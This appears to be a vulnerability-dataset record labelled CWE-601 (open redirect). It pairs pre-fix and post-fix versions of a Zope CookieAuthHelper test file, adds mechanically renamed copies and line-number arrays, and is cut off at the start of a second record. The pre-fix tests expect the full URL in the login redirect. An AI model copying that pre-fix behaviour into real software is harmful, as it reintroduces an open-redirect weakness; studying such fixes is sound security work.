784,
789,
791,
794,
800,
801,
807,
810,
814,
819,
820,
821,
829,
837,
839,
844,
845,
850,
855,
857,
861,
864,
866,
869,
874,
877,
880,
881,
882,
883,
884,
885,
886,
891,
892,
894,
35,
36,
37,
38,
39,
40,
41,
83,
84,
85,
86,
87,
88,
89,
90,
91,
102,
103,
104,
105,
106,
107,
108,
109,
110,
285,
286,
287,
288,
289,
313,
314,
315,
316,
317,
318,
319,
320,
321,
773,
774,
775,
776,
777,
778,
779,
803,
804,
805,
806,
807,
808,
809,
810,
811,
812,
813,
848,
849,
850,
851,
852,
853,
854,
123,
124,
125,
126,
127,
128,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
217,
218,
219,
220,
221,
222,
223,
229,
230,
231,
232,
233,
234,
235,
236,
237,
238,
239,
240,
241,
242,
243,
244,
245,
246,
247,
248,
249,
339,
340,
341,
342,
343,
344,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
374,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
425,
426,
427,
428,
429,
430,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
501,
502,
503,
504,
505,
506,
515,
516,
517,
518,
519,
520,
521,
522,
523,
546,
547,
548,
549,
550,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
589,
590,
591,
592,
593,
594,
750,
751,
752,
753,
754,
755,
756,
757,
758,
759,
760,
859,
860,
868,
869,
870,
871,
872,
873
] |
4CWE-601
| ##############################################################################
#
# Copyright (c) 2001 Zope Foundation and Contributors
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this
# distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class FauxSettableRequest(FauxRequest):
def set(self, name, value):
self._dict[name] = value
class FauxCookieResponse(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def setCookie(self, cookie_name, cookie_value, path):
self.cookies[(cookie_name, path)] = cookie_value
def expireCookie(self, cookie_name, path):
if (cookie_name, path) in self.cookies:
del self.cookies[(cookie_name, path)]
def redirect(self, location, status=302, lock=0):
self.status = status
self.headers['Location'] = location
def setHeader(self, name, value):
self.headers[name] = value
class CookieAuthHelperTests(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def _getTargetClass(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def _makeOne(self, id='test', *args, **kw):
return self._getTargetClass()(id=id, *args, **kw)
def _makeTree(self):
rc = FauxObject('rc')
root = FauxRoot('root').__of__(rc)
folder = FauxContainer('folder').__of__(root)
object = FauxObject('object').__of__(folder)
return rc, root, folder, object
def test_extractCredentials_no_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_with_form_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=response)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_with_deleted_cookie(self):
# http://www.zope.org/Collectors/PAS/43
# Edge case: The ZPublisher sets a cookie's value to "deleted"
# in the current request if expireCookie is called. If we hit
# extractCredentials in the same request after this, it would
# blow up trying to deal with the invalid cookie value.
helper = self._makeOne()
response = FauxCookieResponse()
req_data = {helper.cookie_name: 'deleted', 'RESPONSE': response}
request = FauxSettableRequest(**req_data)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request), {})
def test_challenge(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
testURL = 'http://test'
request = FauxRequest(RESPONSE=response, URL=testURL,
ACTUAL_URL=testURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
self.assertTrue(response.headers['Location'].endswith(quote(testURL)))
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_challenge_with_vhm(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
vhm = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
actualURL = 'http://test/xxx'
request = FauxRequest(RESPONSE=response, URL=vhm,
ACTUAL_URL=actualURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
loc = response.headers['Location']
self.assertTrue(loc.endswith(quote(actualURL)))
self.assertFalse(loc.endswith(quote(vhm)))
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_resetCredentials(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
helper.resetCredentials(request, response)
self.assertEqual(len(response.cookies), 0)
def test_loginWithoutCredentialsUpdate(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo', __ac_password='bar',
RESPONSE=response)
request.form['came_from'] = ''
helper.REQUEST = request
helper.login()
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_from_cookie_with_colon_in_password(self):
# http://www.zope.org/Collectors/PAS/51
# Passwords with ":" characters broke authentication
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
username = codecs.encode(b'foo', 'hex_codec')
password = codecs.encode(b'b:ar', 'hex_codec')
cookie_str = b'%s:%s' % (username, password)
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def test_extractCredentials_from_cookie_with_colon_that_is_not_ours(self):
# http://article.gmane.org/gmane.comp.web.zope.plone.product-developers/5145
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_str = b'cookie:from_other_plugin'
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_from_cookie_with_bad_binascii(self):
# this might happen between browser implementations
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_val = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
| ##############################################################################
#
# Copyright (c) 2001 Zope Foundation and Contributors
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this
# distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class FauxSettableRequest(FauxRequest):
def set(self, name, value):
self._dict[name] = value
class FauxCookieResponse(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def setCookie(self, cookie_name, cookie_value, path):
self.cookies[(cookie_name, path)] = cookie_value
def expireCookie(self, cookie_name, path):
if (cookie_name, path) in self.cookies:
del self.cookies[(cookie_name, path)]
def redirect(self, location, status=302, lock=0):
self.status = status
self.headers['Location'] = location
def setHeader(self, name, value):
self.headers[name] = value
class CookieAuthHelperTests(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def _getTargetClass(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def _makeOne(self, id='test', *args, **kw):
return self._getTargetClass()(id=id, *args, **kw)
def _makeTree(self):
rc = FauxObject('rc')
root = FauxRoot('root').__of__(rc)
folder = FauxContainer('folder').__of__(root)
object = FauxObject('object').__of__(folder)
return rc, root, folder, object
def test_extractCredentials_no_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_with_form_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=response)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_with_deleted_cookie(self):
# http://www.zope.org/Collectors/PAS/43
# Edge case: The ZPublisher sets a cookie's value to "deleted"
# in the current request if expireCookie is called. If we hit
# extractCredentials in the same request after this, it would
# blow up trying to deal with the invalid cookie value.
helper = self._makeOne()
response = FauxCookieResponse()
req_data = {helper.cookie_name: 'deleted', 'RESPONSE': response}
request = FauxSettableRequest(**req_data)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request), {})
def test_challenge(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
testPath = '/some/path'
testURL = 'http://test' + testPath
request = FauxRequest(RESPONSE=response, URL=testURL,
ACTUAL_URL=testURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
loc = response.headers['Location']
self.assertTrue(loc.endswith(quote(testPath)))
self.assertNotIn(testURL, loc)
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_challenge_with_vhm(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
vhm = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
actualURL = 'http://test/xxx'
request = FauxRequest(RESPONSE=response, URL=vhm,
ACTUAL_URL=actualURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
loc = response.headers['Location']
self.assertTrue(loc.endswith(quote('/xxx')))
self.assertFalse(loc.endswith(quote(vhm)))
self.assertNotIn(actualURL, loc)
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_resetCredentials(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
helper.resetCredentials(request, response)
self.assertEqual(len(response.cookies), 0)
def test_loginWithoutCredentialsUpdate(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo', __ac_password='bar',
RESPONSE=response)
request.form['came_from'] = ''
helper.REQUEST = request
helper.login()
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_from_cookie_with_colon_in_password(self):
# http://www.zope.org/Collectors/PAS/51
# Passwords with ":" characters broke authentication
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
username = codecs.encode(b'foo', 'hex_codec')
password = codecs.encode(b'b:ar', 'hex_codec')
cookie_str = b'%s:%s' % (username, password)
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def test_extractCredentials_from_cookie_with_colon_that_is_not_ours(self):
# http://article.gmane.org/gmane.comp.web.zope.plone.product-developers/5145
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_str = b'cookie:from_other_plugin'
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_from_cookie_with_bad_binascii(self):
# this might happen between browser implementations
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_val = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
| open_redirect | {
"code": [
" testURL = 'http://test'",
" self.assertTrue(response.headers['Location'].endswith(quote(testURL)))",
" self.assertTrue(loc.endswith(quote(actualURL)))"
],
"line_no": [
131,
141,
162
]
} | {
"code": [
" testPath = '/some/path'",
" testURL = 'http://test' + testPath",
" loc = response.headers['Location']",
" self.assertTrue(loc.endswith(quote(testPath)))",
" self.assertNotIn(testURL, loc)",
" self.assertTrue(loc.endswith(quote('/xxx')))"
],
"line_no": [
131,
132,
142,
143,
144,
165
]
} |
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class CLASS_0(FauxRequest):
def FUNC_0(self, VAR_0, VAR_1):
self._dict[VAR_0] = VAR_1
class CLASS_1(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def FUNC_1(self, VAR_2, VAR_3, VAR_4):
self.cookies[(VAR_2, VAR_4)] = VAR_3
def FUNC_2(self, VAR_2, VAR_4):
if (VAR_2, VAR_4) in self.cookies:
del self.cookies[(VAR_2, VAR_4)]
def FUNC_3(self, VAR_5, VAR_6=302, VAR_7=0):
self.status = VAR_6
self.headers['Location'] = VAR_5
def FUNC_4(self, VAR_0, VAR_1):
self.headers[VAR_0] = VAR_1
class CLASS_2(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def FUNC_5(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def FUNC_6(self, VAR_8='test', *VAR_9, **VAR_10):
return self._getTargetClass()(VAR_8=id, *VAR_9, **VAR_10)
def FUNC_7(self):
VAR_11 = FauxObject('rc')
VAR_12 = FauxRoot('root').__of__(VAR_11)
VAR_13 = FauxContainer('folder').__of__(VAR_12)
VAR_14 = FauxObject('object').__of__(VAR_13)
return VAR_11, VAR_12, VAR_13, VAR_14
def FUNC_8(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_9(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_10(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_18 = {VAR_15.cookie_name: 'deleted', 'RESPONSE': VAR_16}
VAR_17 = CLASS_0(**VAR_18)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_11(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_19 = 'http://test'
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_19,
ACTUAL_URL=VAR_19)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
self.assertTrue(VAR_16.headers['Location'].endswith(quote(VAR_19)))
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_12(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_20 = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
VAR_21 = 'http://test/xxx'
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_20,
ACTUAL_URL=VAR_21)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
VAR_22 = VAR_16.headers['Location']
self.assertTrue(VAR_22.endswith(quote(VAR_21)))
self.assertFalse(VAR_22.endswith(quote(VAR_20)))
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_13(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
VAR_15.resetCredentials(VAR_17, VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_14(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo', __ac_password='bar',
RESPONSE=VAR_16)
VAR_17.form['came_from'] = ''
VAR_15.REQUEST = VAR_17
VAR_15.login()
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_15(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_23 = codecs.encode(b'foo', 'hex_codec')
VAR_24 = codecs.encode(b'b:ar', 'hex_codec')
VAR_25 = b'%s:%s' % (VAR_23, VAR_24)
VAR_26 = encodebytes(VAR_25)
VAR_26 = cookie_val.rstrip()
if six.PY3:
VAR_26 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_26)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def FUNC_16(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_25 = b'cookie:from_other_plugin'
VAR_26 = encodebytes(VAR_25)
VAR_26 = cookie_val.rstrip()
if six.PY3:
VAR_26 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_26)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_17(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_26 = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
VAR_17.set(VAR_15.cookie_name, VAR_26)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
|
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class CLASS_0(FauxRequest):
def FUNC_0(self, VAR_0, VAR_1):
self._dict[VAR_0] = VAR_1
class CLASS_1(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def FUNC_1(self, VAR_2, VAR_3, VAR_4):
self.cookies[(VAR_2, VAR_4)] = VAR_3
def FUNC_2(self, VAR_2, VAR_4):
if (VAR_2, VAR_4) in self.cookies:
del self.cookies[(VAR_2, VAR_4)]
def FUNC_3(self, VAR_5, VAR_6=302, VAR_7=0):
self.status = VAR_6
self.headers['Location'] = VAR_5
def FUNC_4(self, VAR_0, VAR_1):
self.headers[VAR_0] = VAR_1
class CLASS_2(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def FUNC_5(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def FUNC_6(self, VAR_8='test', *VAR_9, **VAR_10):
return self._getTargetClass()(VAR_8=id, *VAR_9, **VAR_10)
def FUNC_7(self):
VAR_11 = FauxObject('rc')
VAR_12 = FauxRoot('root').__of__(VAR_11)
VAR_13 = FauxContainer('folder').__of__(VAR_12)
VAR_14 = FauxObject('object').__of__(VAR_13)
return VAR_11, VAR_12, VAR_13, VAR_14
def FUNC_8(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_9(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_10(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_18 = {VAR_15.cookie_name: 'deleted', 'RESPONSE': VAR_16}
VAR_17 = CLASS_0(**VAR_18)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_11(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_19 = '/some/path'
VAR_20 = 'http://test' + VAR_19
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_20,
ACTUAL_URL=VAR_20)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
VAR_21 = VAR_16.headers['Location']
self.assertTrue(VAR_21.endswith(quote(VAR_19)))
self.assertNotIn(VAR_20, VAR_21)
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_12(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_22 = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
VAR_23 = 'http://test/xxx'
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_22,
ACTUAL_URL=VAR_23)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
VAR_21 = VAR_16.headers['Location']
self.assertTrue(VAR_21.endswith(quote('/xxx')))
self.assertFalse(VAR_21.endswith(quote(VAR_22)))
self.assertNotIn(VAR_23, VAR_21)
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_13(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
VAR_15.resetCredentials(VAR_17, VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_14(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo', __ac_password='bar',
RESPONSE=VAR_16)
VAR_17.form['came_from'] = ''
VAR_15.REQUEST = VAR_17
VAR_15.login()
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_15(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_24 = codecs.encode(b'foo', 'hex_codec')
VAR_25 = codecs.encode(b'b:ar', 'hex_codec')
VAR_26 = b'%s:%s' % (VAR_24, VAR_25)
VAR_27 = encodebytes(VAR_26)
VAR_27 = cookie_val.rstrip()
if six.PY3:
VAR_27 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_27)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def FUNC_16(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_26 = b'cookie:from_other_plugin'
VAR_27 = encodebytes(VAR_26)
VAR_27 = cookie_val.rstrip()
if six.PY3:
VAR_27 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_27)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_17(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_27 = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
VAR_17.set(VAR_15.cookie_name, VAR_27)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
21,
24,
34,
35,
37,
40,
41,
43,
49,
52,
56,
60,
63,
64,
70,
72,
74,
76,
78,
80,
82,
87,
89,
91,
95,
97,
99,
105,
113,
115,
116,
117,
118,
119,
125,
127,
135,
137,
145,
151,
155,
157,
167,
172,
175,
183,
186,
188,
189,
193,
202,
208,
210,
214,
221,
223,
225,
229,
232,
234
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
21,
24,
34,
35,
37,
40,
41,
43,
49,
52,
56,
60,
63,
64,
70,
72,
74,
76,
78,
80,
82,
87,
89,
91,
95,
97,
99,
105,
113,
115,
116,
117,
118,
119,
125,
127,
136,
138,
148,
154,
158,
160,
171,
176,
179,
187,
190,
192,
193,
197,
206,
212,
214,
218,
225,
227,
229,
233,
236,
238
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
